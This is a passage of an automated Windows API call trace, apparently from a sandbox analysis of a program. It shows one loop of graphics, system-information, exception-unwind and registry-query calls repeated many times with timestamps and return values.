0x54040713 [0017.807] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4a04027d [0017.807] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040db4 [0017.807] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040db5 [0017.807] CombineRgn (hrgnDst=0x1040db4, hrgnSrc1=0x54040713, hrgnSrc2=0x4a04027d, iMode=1) returned 1 [0017.807] CombineRgn (hrgnDst=0x1040db5, hrgnSrc1=0x54040713, hrgnSrc2=0x4a04027d, iMode=4) returned 2 [0017.807] CreateSolidBrush (color=0xff) returned 0x2100db3 [0017.807] CreateSolidBrush (color=0xff0000) returned 0x1100db6 [0017.807] DeleteObject (ho=0x1100db6) returned 1 [0017.807] DeleteObject (ho=0x4a04027d) returned 1 [0017.807] DeleteObject (ho=0x54040713) returned 1 [0017.807] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.807] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.807] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.807] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.807] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.807] BeginPath (hdc=0x0) returned 0 [0017.807] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.807] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.807] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.807] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.807] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.807] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.807] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.807] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.807] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4b04027d [0017.807] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x55040713 [0017.807] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040db7 [0017.807] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040db8 [0017.808] CombineRgn (hrgnDst=0x1040db7, hrgnSrc1=0x4b04027d, hrgnSrc2=0x55040713, iMode=1) returned 1 [0017.808] CombineRgn (hrgnDst=0x1040db8, hrgnSrc1=0x4b04027d, hrgnSrc2=0x55040713, iMode=4) returned 2 [0017.808] CreateSolidBrush (color=0xff) returned 0x2100db6 [0017.808] CreateSolidBrush (color=0xff0000) returned 0x1100db9 [0017.808] DeleteObject (ho=0x1100db9) returned 1 [0017.808] DeleteObject (ho=0x55040713) returned 1 [0017.808] DeleteObject (ho=0x4b04027d) returned 1 [0017.808] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.808] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.808] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.808] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.808] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.808] BeginPath (hdc=0x0) returned 0 [0017.808] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.808] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.808] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.808] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.808] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.808] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.808] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.808] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.808] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x56040713 [0017.808] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4c04027d [0017.808] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dba [0017.808] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dbb [0017.808] CombineRgn (hrgnDst=0x1040dba, hrgnSrc1=0x56040713, hrgnSrc2=0x4c04027d, iMode=1) returned 1 [0017.808] CombineRgn (hrgnDst=0x1040dbb, hrgnSrc1=0x56040713, hrgnSrc2=0x4c04027d, iMode=4) returned 2 [0017.808] CreateSolidBrush (color=0xff) returned 0x2100db9 [0017.808] CreateSolidBrush (color=0xff0000) returned 0x1100dbc [0017.809] DeleteObject (ho=0x1100dbc) returned 1 [0017.809] DeleteObject (ho=0x4c04027d) returned 1 [0017.809] DeleteObject (ho=0x56040713) returned 1 [0017.809] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.809] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.809] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.809] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.809] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.809] BeginPath (hdc=0x0) returned 0 [0017.809] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.809] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.809] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.809] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.809] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.809] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.809] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.809] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.809] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4d04027d [0017.809] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x57040713 [0017.809] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dbd [0017.809] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dbe [0017.809] CombineRgn (hrgnDst=0x1040dbd, hrgnSrc1=0x4d04027d, hrgnSrc2=0x57040713, iMode=1) returned 1 [0017.809] CombineRgn (hrgnDst=0x1040dbe, hrgnSrc1=0x4d04027d, hrgnSrc2=0x57040713, iMode=4) returned 2 [0017.809] CreateSolidBrush (color=0xff) returned 0x2100dbc [0017.809] CreateSolidBrush (color=0xff0000) returned 0x1100dbf [0017.809] DeleteObject (ho=0x1100dbf) returned 1 [0017.809] DeleteObject (ho=0x57040713) returned 1 [0017.810] DeleteObject (ho=0x4d04027d) returned 1 [0017.810] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.810] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.810] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.810] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.810] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.810] BeginPath (hdc=0x0) returned 0 [0017.810] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.810] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.810] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.810] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.810] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.810] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.810] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.810] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.810] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x58040713 [0017.810] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x4e04027d [0017.810] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dc0 [0017.810] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dc1 [0017.810] CombineRgn (hrgnDst=0x1040dc0, hrgnSrc1=0x58040713, hrgnSrc2=0x4e04027d, iMode=1) returned 1 [0017.810] CombineRgn (hrgnDst=0x1040dc1, hrgnSrc1=0x58040713, hrgnSrc2=0x4e04027d, iMode=4) returned 2 [0017.810] CreateSolidBrush (color=0xff) returned 0x2100dbf [0017.810] CreateSolidBrush (color=0xff0000) returned 0x1100dc2 [0017.810] DeleteObject (ho=0x1100dc2) returned 1 [0017.810] DeleteObject (ho=0x4e04027d) returned 1 [0017.810] DeleteObject (ho=0x58040713) returned 1 [0017.810] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.811] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.811] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.811] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.811] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.811] BeginPath (hdc=0x0) returned 0 [0017.811] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.811] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.811] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.811] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.811] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.811] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.811] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.811] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.811] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x4f04027d [0017.811] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x59040713 [0017.812] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dc3 [0017.812] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dc4 [0017.812] CombineRgn (hrgnDst=0x1040dc3, hrgnSrc1=0x4f04027d, hrgnSrc2=0x59040713, iMode=1) returned 1 [0017.812] CombineRgn (hrgnDst=0x1040dc4, hrgnSrc1=0x4f04027d, hrgnSrc2=0x59040713, iMode=4) returned 2 [0017.812] CreateSolidBrush (color=0xff) returned 0x2100dc2 [0017.812] CreateSolidBrush (color=0xff0000) returned 0x1100dc5 [0017.812] DeleteObject (ho=0x1100dc5) returned 1 [0017.812] DeleteObject (ho=0x59040713) returned 1 [0017.812] DeleteObject (ho=0x4f04027d) returned 1 [0017.812] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.812] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.812] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.812] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.812] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.812] BeginPath (hdc=0x0) returned 0 [0017.812] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.812] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.812] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.812] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.812] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.812] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.812] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.812] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.812] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5a040713 [0017.812] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5004027d [0017.812] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dc6 [0017.812] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dc7 [0017.812] CombineRgn (hrgnDst=0x1040dc6, hrgnSrc1=0x5a040713, hrgnSrc2=0x5004027d, iMode=1) returned 1 [0017.812] CombineRgn (hrgnDst=0x1040dc7, hrgnSrc1=0x5a040713, hrgnSrc2=0x5004027d, iMode=4) returned 2 [0017.813] CreateSolidBrush (color=0xff) returned 0x2100dc5 [0017.813] CreateSolidBrush (color=0xff0000) returned 0x1100dc8 [0017.813] DeleteObject (ho=0x1100dc8) returned 1 [0017.813] DeleteObject (ho=0x5004027d) returned 1 [0017.813] DeleteObject (ho=0x5a040713) returned 1 [0017.813] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.813] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.813] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.813] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.813] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.813] BeginPath (hdc=0x0) returned 0 [0017.813] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.813] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.813] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.813] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.813] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.813] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.813] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.813] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.813] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5104027d [0017.813] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5b040713 [0017.813] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dc9 [0017.813] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dca [0017.813] CombineRgn (hrgnDst=0x1040dc9, hrgnSrc1=0x5104027d, hrgnSrc2=0x5b040713, iMode=1) returned 1 [0017.813] CombineRgn (hrgnDst=0x1040dca, hrgnSrc1=0x5104027d, hrgnSrc2=0x5b040713, iMode=4) returned 2 [0017.813] CreateSolidBrush (color=0xff) returned 0x2100dc8 [0017.813] CreateSolidBrush (color=0xff0000) returned 0x1100dcb [0017.813] DeleteObject (ho=0x1100dcb) returned 1 [0017.813] DeleteObject (ho=0x5b040713) returned 1 [0017.813] DeleteObject (ho=0x5104027d) returned 1 [0017.814] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.814] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.814] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.814] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.814] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.814] BeginPath (hdc=0x0) returned 0 [0017.814] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.814] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.814] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.814] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.814] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.814] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.814] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.814] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.814] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5c040713 [0017.814] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5204027d [0017.814] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dcc [0017.814] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dcd [0017.814] CombineRgn (hrgnDst=0x1040dcc, hrgnSrc1=0x5c040713, hrgnSrc2=0x5204027d, iMode=1) returned 1 [0017.814] CombineRgn (hrgnDst=0x1040dcd, hrgnSrc1=0x5c040713, hrgnSrc2=0x5204027d, iMode=4) returned 2 [0017.814] CreateSolidBrush (color=0xff) returned 0x2100dcb [0017.814] CreateSolidBrush (color=0xff0000) returned 0x1100dce [0017.814] DeleteObject (ho=0x1100dce) returned 1 [0017.814] DeleteObject (ho=0x5204027d) returned 1 [0017.814] DeleteObject (ho=0x5c040713) returned 1 [0017.814] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0017.814] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0017.815] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.815] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0017.815] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0017.815] BeginPath (hdc=0x0) returned 0 [0017.815] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0017.815] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0017.815] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0017.815] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0017.815] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0017.815] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0017.815] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0017.815] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0017.815] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0x5304027d [0017.815] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0x5d040713 [0017.815] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dcf [0017.815] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040dd0 [0017.815] CombineRgn (hrgnDst=0x1040dcf, hrgnSrc1=0x5304027d, hrgnSrc2=0x5d040713, iMode=1) returned 1 [0017.815] CombineRgn (hrgnDst=0x1040dd0, hrgnSrc1=0x5304027d, hrgnSrc2=0x5d040713, iMode=4) returned 2 [0017.815] CreateSolidBrush (color=0xff) returned 0x2100dce [0017.815] CreateSolidBrush (color=0xff0000) returned 0x1100dd1 [0017.815] DeleteObject (ho=0x1100dd1) returned 1 [0017.815] DeleteObject (ho=0x5d040713) returned 1 [0017.815] DeleteObject (ho=0x5304027d) returned 1 [0017.815] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, 